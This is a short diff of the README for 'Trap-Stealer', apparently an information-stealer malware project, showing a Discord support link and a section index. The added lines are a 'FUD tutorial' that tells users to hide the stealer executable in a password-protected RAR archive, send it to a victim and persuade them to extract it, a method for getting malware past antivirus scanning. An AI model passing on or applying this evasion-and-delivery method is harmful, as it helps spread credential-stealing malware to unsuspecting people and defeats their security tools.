TheCuteOwl/Trap-Stealer/README.md

   <a href="https://discord.gg/SKGjXfmFga" target="_blank">Discord Support URL (Any features requests/Error fixing)</a>
 </p>

 ## 🌐 〢 Summary

 - [✨・Features](#features)
 - [📝・Changelog](#changelog)
 - [💼・Terms](#terms)

+# (Temporary FUD tutorial)

+Create an password protected archive (.rar) with the exe inside, then just send it to the person and tell him to extract it with the password

 <details>
   <summary>Cybersecurity Society start talking about us</summary>